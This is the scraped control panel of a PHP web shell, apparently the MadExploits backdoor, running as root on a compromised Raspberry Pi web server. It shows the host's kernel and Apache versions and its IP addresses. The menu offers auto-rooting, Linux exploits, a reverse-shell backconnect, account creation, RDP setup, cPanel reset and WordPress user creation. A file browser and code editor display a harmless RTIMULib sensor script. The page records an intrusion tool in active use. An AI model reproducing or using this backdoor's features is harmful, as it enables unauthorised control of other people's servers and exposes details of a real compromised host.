Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
sense-hat /
examples /
RTIMULib /
python /
[ HOME SHELL ]
Name
Size
Permission
Action
Fusion.py
1.07
KB
-rwxr-xr-x
Fusion10.py
2.25
KB
-rwxr-xr-x
Fusion11.py
2.82
KB
-rwxr-xr-x
InjectIMU.py
1.13
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Fusion11.py
#!/usr/bin/python import sys, getopt sys.path.append('.') import RTIMU import os.path import time import math SETTINGS_FILE = "RTIMULib" # computeHeight() - the conversion uses the formula: # # h = (T0 / L0) * ((p / P0)**(-(R* * L0) / (g0 * M)) - 1) # # where: # h = height above sea level # T0 = standard temperature at sea level = 288.15 # L0 = standard temperatur elapse rate = -0.0065 # p = measured pressure # P0 = static pressure = 1013.25 # g0 = gravitational acceleration = 9.80665 # M = mloecular mass of earth's air = 0.0289644 # R* = universal gas constant = 8.31432 # # Given the constants, this works out to: # # h = 44330.8 * (1 - (p / P0)**0.190263) def computeHeight(pressure): return 44330.8 * (1 - pow(pressure / 1013.25, 0.190263)); print("Using settings file " + SETTINGS_FILE + ".ini") if not os.path.exists(SETTINGS_FILE + ".ini"): print("Settings file does not exist, will be created") s = RTIMU.Settings(SETTINGS_FILE) imu = RTIMU.RTIMU(s) pressure = RTIMU.RTPressure(s) humidity = RTIMU.RTHumidity(s) print("IMU Name: " + imu.IMUName()) print("Pressure Name: " + pressure.pressureName()) print("Humidity Name: " + humidity.humidityName()) if (not imu.IMUInit()): print("IMU Init Failed") sys.exit(1) else: print("IMU Init Succeeded"); # this is a good time to set any fusion parameters imu.setSlerpPower(0.02) imu.setGyroEnable(True) imu.setAccelEnable(True) imu.setCompassEnable(True) if (not pressure.pressureInit()): print("Pressure sensor Init Failed") else: print("Pressure sensor Init Succeeded") if (not humidity.humidityInit()): print("Humidity sensor Init Failed") else: print("Humidity sensor Init Succeeded") poll_interval = imu.IMUGetPollInterval() print("Recommended Poll Interval: %dmS\n" % poll_interval) while True: if imu.IMURead(): # x, y, z = imu.getFusionData() # print("%f %f %f" % (x,y,z)) data = imu.getIMUData() (data["pressureValid"], data["pressure"], data["pressureTemperatureValid"], data["pressureTemperature"]) = pressure.pressureRead() (data["humidityValid"], data["humidity"], data["humidityTemperatureValid"], data["humidityTemperature"]) = humidity.humidityRead() fusionPose = data["fusionPose"] print("r: %f p: %f y: %f" % (math.degrees(fusionPose[0]), math.degrees(fusionPose[1]), math.degrees(fusionPose[2]))) if (data["pressureValid"]): print("Pressure: %f, height above sea level: %f" % (data["pressure"], computeHeight(data["pressure"]))) if (data["pressureTemperatureValid"]): print("Pressure temperature: %f" % (data["pressureTemperature"])) if (data["humidityValid"]): print("Humidity: %f" % (data["humidity"])) if (data["humidityTemperatureValid"]): print("Humidity temperature: %f" % (data["humidityTemperature"])) time.sleep(poll_interval*1.0/1000.0)
Close
